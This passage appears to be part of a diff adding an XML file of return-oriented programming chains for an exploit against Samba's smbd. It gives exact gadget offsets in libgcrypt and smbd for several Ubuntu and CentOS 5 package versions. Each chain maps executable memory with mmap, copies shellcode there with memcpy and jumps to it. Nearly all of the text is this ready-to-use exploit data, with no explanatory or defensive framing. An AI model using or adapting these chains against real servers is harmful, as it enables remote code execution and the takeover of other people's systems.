b69e8000-b69eb000 rw-p 00070000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
|
|
13
|
+
-->
|
|
14
|
+
|
|
15
|
+
<gadgets base="0">
|
|
16
|
+
<gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
|
|
17
|
+
<gadget offset="0x00071ad4">offset of .got.plt section</gadget>
|
|
18
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
19
|
+
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
|
20
|
+
<gadget offset="0x00071af4">mmap@got - 4</gadget>
|
|
21
|
+
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
|
22
|
+
<gadget offset="0x00009974">jmp eax</gadget>
|
|
23
|
+
<gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
|
24
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
25
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
26
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
27
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
28
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
29
|
+
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
|
30
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
31
|
+
<gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
|
|
32
|
+
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
|
33
|
+
<gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
|
34
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
35
|
+
<gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
|
|
36
|
+
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
|
|
37
|
+
<gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
|
|
38
|
+
<gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
|
|
39
|
+
<gadget offset="0x00063dbf">pop eax ; ret</gadget>
|
|
40
|
+
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
|
|
41
|
+
<gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
|
42
|
+
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
|
43
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
44
|
+
<gadget offset="0x00055743">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
|
45
|
+
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
|
46
|
+
<gadget offset="0x00071b6c">memcpy@got - 4</gadget>
|
|
47
|
+
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
|
48
|
+
<gadget offset="0x00055743">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
49
|
+
<!-- set ecx to same value than edx -->
|
|
50
|
+
<gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
|
|
51
|
+
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
|
52
|
+
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
|
|
53
|
+
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
|
|
54
|
+
<gadget offset="0x0005c914"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
55
|
+
<gadget offset="0x0006e61f"> xchg eax, esi ; ret ; || restore eax</gadget>
|
|
56
|
+
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
|
|
57
|
+
<gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
|
|
58
|
+
<gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
|
|
59
|
+
<gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
|
60
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
61
|
+
<gadget offset="0x0005b68a">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
|
62
|
+
<gadget value ="size">payload size</gadget>
|
|
63
|
+
</gadgets>
|
|
64
|
+
|
|
65
|
+
|
|
66
|
+
|
|
67
|
+
|
|
68
|
+
</rop>
|
|
69
|
+
<rop>
|
|
70
|
+
<compatibility>
|
|
71
|
+
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
|
|
72
|
+
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
|
|
73
|
+
</compatibility>
|
|
74
|
+
|
|
75
|
+
<!--
|
|
76
|
+
dpkg -l|grep libgcr
|
|
77
|
+
ii libgcrypt11 1.5.0-1 LGPL Crypto library - runtime library
|
|
78
|
+
b69e3000-b6a65000 r-xp 00000000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
|
79
|
+
b6a65000-b6a66000 r**p 00081000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
|
80
|
+
b6a66000-b6a68000 rw-p 00082000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
|
81
|
+
-->
|
|
82
|
+
|
|
83
|
+
<gadgets base="0">
|
|
84
|
+
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
|
|
85
|
+
<gadget offset="0x00082ff4">offset of .got.plt section</gadget>
|
|
86
|
+
<gadget offset="0x0006933f">pop eax; ret</gadget>
|
|
87
|
+
<gadget offset="0x000830a4">mmap@got - 4</gadget>
|
|
88
|
+
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
|
89
|
+
<gadget offset="0x00007d79">jmp eax</gadget>
|
|
90
|
+
<gadget offset="0x00005646">add esp, 0x1C; ret || mmap ret, skip overt mmap arguments</gadget>
|
|
91
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
92
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
93
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
94
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
95
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
96
|
+
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
|
97
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
98
|
+
<gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
|
|
99
|
+
<gadget offset="0x00084000">edx = writable location, in GOT</gadget>
|
|
100
|
+
<gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret || save EAX (mmaped addr) in GOT</gadget>
|
|
101
|
+
<gadget offset="0x00008532">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
|
102
|
+
<gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
|
|
103
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
104
|
+
<gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
105
|
+
<gadget offset="0x0006933f">pop eax ; ret</gadget>
|
|
106
|
+
<gadget offset="0x00084100">eax = writable location, in GOT</gadget>
|
|
107
|
+
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
|
|
108
|
+
<gadget offset="0x00084100">ebx = writable location, in GOT</gadget>
|
|
109
|
+
<gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
|
|
110
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
111
|
+
<gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
|
|
112
|
+
<gadget value ="0x00000000">junk for ebx</gadget>
|
|
113
|
+
<gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
|
|
114
|
+
<gadget value ="0x00000000">junk for edi</gadget>
|
|
115
|
+
<gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
|
|
116
|
+
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
|
|
117
|
+
<gadget offset="0x0006933f">pop eax; ret</gadget>
|
|
118
|
+
<gadget offset="0x00083024">memcpy@got - 4</gadget>
|
|
119
|
+
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
|
120
|
+
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
121
|
+
<gadget offset="0x00004803">pop esi ; ret</gadget>
|
|
122
|
+
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
|
|
123
|
+
<gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
|
|
124
|
+
<gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
|
125
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
126
|
+
<gadget offset="0x0001fdfa">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
|
127
|
+
<gadget value ="size">payload size</gadget>
|
|
128
|
+
</gadgets>
|
|
129
|
+
</rop>
|
|
130
|
+
<rop>
|
|
131
|
+
<compatibility>
|
|
132
|
+
<target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
|
|
133
|
+
</compatibility>
|
|
134
|
+
|
|
135
|
+
<!--
|
|
136
|
+
dpkg -l|grep libgcr
|
|
137
|
+
ii libgcrypt11 1.4.6-4ubuntu2 LGPL Crypto library - runtime library
|
|
138
|
+
b69f8000-b6a69000 r-xp 00000000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
|
139
|
+
b6a69000-b6a6a000 r**p 00070000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
|
140
|
+
b6a6a000-b6a6c000 rw-p 00071000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
|
|
141
|
+
|
|
142
|
+
we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
|
|
143
|
+
4 first pops are after pop esp
|
|
144
|
+
-->
|
|
145
|
+
<gadgets base="0">
|
|
146
|
+
<gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
|
|
147
|
+
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
|
|
148
|
+
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
|
149
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
150
|
+
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
|
151
|
+
<gadget offset="0x00072010">mmap@got - 4</gadget>
|
|
152
|
+
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
|
153
|
+
<gadget offset="0x00007f19">jmp eax</gadget>
|
|
154
|
+
<gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
|
155
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
156
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
157
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
158
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
159
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
160
|
+
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
|
161
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
162
|
+
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
|
|
163
|
+
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
|
164
|
+
<gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
|
165
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
166
|
+
<gadget offset="0x0005822d">esi = pop ebx ; pop esi ; pop edi ; ret</gadget>
|
|
167
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
168
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
169
|
+
<gadget offset="0x0005d903">xchg eax, edx ; ret || edx = eax , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
170
|
+
<gadget offset="0x00043cd5">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000008 ; call esi || after call, esi = esp </gadget>
|
|
171
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
172
|
+
<gadget offset="0x00005c60">xchg eax, esi ; ret</gadget>
|
|
173
|
+
<gadget offset="0x0005c45c">pop ecx ; ret</gadget>
|
|
174
|
+
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
|
|
175
|
+
<gadget offset="0x00053dc4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
|
176
|
+
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
|
177
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
178
|
+
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || ebx = src in memcpy</gadget>
|
|
179
|
+
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
|
180
|
+
<gadget offset="0x00072ffc">writable add in GOT - 4</gadget>
|
|
181
|
+
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = mmaped addr</gadget>
|
|
182
|
+
<gadget offset="0x0005cd54">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
|
183
|
+
<gadget offset="0x000641ff">pop eax; ret</gadget>
|
|
184
|
+
<gadget offset="0x0007204c">memcpy@got - 4</gadget>
|
|
185
|
+
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
|
186
|
+
<gadget offset="0x0005c6e9">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
187
|
+
<gadget offset="0x00060e5a">pop esi ; ret</gadget>
|
|
188
|
+
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
|
|
189
|
+
<gadget offset="0x00007d05">pop edi ; pop ebp **1** ; ret</gadget>
|
|
190
|
+
<gadget offset="0x0005822d">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
|
191
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
192
|
+
<gadget offset="0x0005baca">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
|
193
|
+
<gadget value ="size">payload size</gadget>
|
|
194
|
+
</gadgets>
|
|
195
|
+
</rop>
|
|
196
|
+
|
|
197
|
+
<rop>
|
|
198
|
+
<compatibility>
|
|
199
|
+
<target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
|
|
200
|
+
</compatibility>
|
|
201
|
+
|
|
202
|
+
<!--
|
|
203
|
+
dpkg -l|grep libgcrypt
|
|
204
|
+
ii libgcrypt11 1.4.5-2ubuntu1 LGPL Crypto library - runtime library
|
|
205
|
+
b6a20000-b6a91000 r-xp 00000000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
|
206
|
+
b6a91000-b6a92000 r**p 00070000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
|
207
|
+
b6a92000-b6a94000 rw-p 00071000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
|
208
|
+
-->
|
|
209
|
+
|
|
210
|
+
<gadgets base="0">
|
|
211
|
+
<gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
|
|
212
|
+
<gadget offset="0x00071ff4">offset of .got.plt section</gadget>
|
|
213
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
214
|
+
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
|
215
|
+
<gadget offset="0x00072010">mmap@got - 4</gadget>
|
|
216
|
+
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
|
217
|
+
<gadget offset="0x0000922c">jmp eax</gadget>
|
|
218
|
+
<gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
|
219
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
220
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
221
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
222
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
223
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
224
|
+
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
|
225
|
+
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
|
226
|
+
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
|
|
227
|
+
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
|
228
|
+
<gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
|
229
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
230
|
+
<gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
|
|
231
|
+
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
|
|
232
|
+
<gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
|
|
233
|
+
<gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
|
|
234
|
+
<gadget offset="0x0006421f">pop eax ; ret</gadget>
|
|
235
|
+
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
|
|
236
|
+
<gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
|
237
|
+
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
|
238
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
239
|
+
<gadget offset="0x00043999">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
|
240
|
+
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
|
241
|
+
<gadget offset="0x00072094">memcpy@got - 4</gadget>
|
|
242
|
+
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
|
243
|
+
<gadget offset="0x00043999">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
244
|
+
<!-- set ecx to same value than edx -->
|
|
245
|
+
<gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
|
|
246
|
+
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
|
247
|
+
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
|
|
248
|
+
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
|
|
249
|
+
<gadget offset="0x0005cd74"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
250
|
+
<gadget offset="0x0006ea7f"> xchg eax, esi ; ret ; || restore eax</gadget>
|
|
251
|
+
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
|
|
252
|
+
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
|
|
253
|
+
<gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
|
|
254
|
+
<gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
|
255
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
256
|
+
<gadget offset="0x000128cc">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
|
257
|
+
<gadget value ="size">payload size</gadget>
|
|
258
|
+
</gadgets>
|
|
259
|
+
|
|
260
|
+
|
|
261
|
+
</rop>
|
|
262
|
+
|
|
263
|
+
<rop>
|
|
264
|
+
<compatibility>
|
|
265
|
+
<target>3.5.10-0.107.el5 on CentOS 5</target>
|
|
266
|
+
</compatibility>
|
|
267
|
+
|
|
268
|
+
<!--
|
|
269
|
+
yum list |grep libgcrypt
|
|
270
|
+
libgcrypt.i386 1.4.4-5.el5 installed
|
|
271
|
+
02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
|
|
272
|
+
02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
|
|
273
|
+
section is writable and executable, we'll copy the shellcode over there instead of using mmap
|
|
274
|
+
-->
|
|
275
|
+
|
|
276
|
+
<gadgets base="0">
|
|
277
|
+
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
|
|
278
|
+
<gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
|
|
279
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
280
|
+
<gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
|
|
281
|
+
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
|
|
282
|
+
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
|
283
|
+
<gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
|
|
284
|
+
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
|
|
285
|
+
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
|
|
286
|
+
<gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
|
|
287
|
+
<gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
|
|
288
|
+
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
|
|
289
|
+
<gadget offset="0x0006a73f">pop eax ; ret</gadget>
|
|
290
|
+
<gadget offset="0x0007effc">memcpy@got - 4</gadget>
|
|
291
|
+
<gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
|
292
|
+
<gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
|
|
293
|
+
<gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
|
|
294
|
+
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
|
|
295
|
+
<gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
|
|
296
|
+
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
|
297
|
+
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
|
|
298
|
+
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
|
|
299
|
+
<gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
|
|
300
|
+
<gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
|
|
301
|
+
<gadget value ="0x00000000">junk for ebp **1**</gadget>
|
|
302
|
+
<gadget offset="0x0006200a">pushad ; ret</gadget>
|
|
303
|
+
<gadget value ="size">payload size</gadget>
|
|
304
|
+
</gadgets>
|
|
305
|
+
|
|
306
|
+
|
|
307
|
+
</rop>
|
|
308
|
+
|
|
309
|
+
|
|
310
|
+
|
|
311
|
+
|
|
312
|
+
|
|
313
|
+
<!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2
|
|
314
|
+
|
|
315
|
+
<compatibility>
|
|
316
|
+
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
|
|
317
|
+
</compatibility>
|
|
318
|
+
|
|
319
|
+
<gadgets base="0">
|
|
320
|
+
<gadget offset="0x0000f3b1">pop eax; ret</gadget>
|
|
321
|
+
<gadget offset="0x00991ff0">mmap64@got</gadget>
|
|
322
|
+
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
|
323
|
+
<gadget offset="0x008c8997">jmp eax</gadget>
|
|
324
|
+
<gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
|
325
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
326
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
327
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
328
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
329
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
330
|
+
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
|
331
|
+
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
|
332
|
+
<gadget offset="0x0034fbd2">pop edx ; ret</gadget>
|
|
333
|
+
<gadget offset="0x0099a000">edx = writable location, in GOT</gadget>
|
|
334
|
+
<gadget offset="0x0034c2bc">mov dword [edx], eax ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
|
335
|
+
<gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
|
336
|
+
<gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
|
337
|
+
<gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
|
|
338
|
+
<gadget value ="0x00000000">junk for esi</gadget>
|
|
339
|
+
<gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
|
|
340
|
+
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
|
|
341
|
+
<gadget offset="0x001a73b2">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
|
|
342
|
+
<gadget offset="0x0008c5ac">pop eax; ret</gadget>
|
|
343
|
+
<gadget offset="0x00991904">memcpy@got</gadget>
|
|
344
|
+
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
|
345
|
+
<gadget offset="0x001726b5">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
|
346
|
+
<gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
|
|
347
|
+
<gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
|
348
|
+
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
|
349
|
+
<gadget offset="0x0002ab2c">pushad, ret</gadget>
|
|
350
|
+
<gadget value ="size">payload size</gadget>
|
|
351
|
+
</gadgets>
|
|
352
|
+
|
|
353
|
+
|
|
354
|
+
ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
|
|
355
|
+
<compatibility>
|
|
356
|
+
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
|
|
357
|
+
</compatibility>
|
|
358
|
+
|
|
359
|
+
<gadgets base="0">
|
|
360
|
+
<gadget offset="0x0000f445">pop eax; ret</gadget>
|
|
361
|
+
<gadget offset="0x008c1008">mmap64@got</gadget>
|
|
362
|
+
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
|
363
|
+
<gadget offset="0x0009e8e4">jmp eax</gadget>
|
|
364
|
+
<gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
|
365
|
+
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
|
366
|
+
<gadget value ="0x00001000">mmap arg : size</gadget>
|
|
367
|
+
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
|
368
|
+
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
|
369
|
+
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
|
370
|
+
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
|
371
|
+
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
|
372
|
+
<gadget offset="0x001f6142">pop edx ; ret</gadget>
|
|
373
|
+
<gadget offset="0x008c9000">edx = writable location, in GOT</gadget>
|
|
374
|
+
<gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
|
375
|
+
<gadget value ="0x00000000">junk for ebp</gadget>
|
|
376
|
+
<gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
|
377
|
+
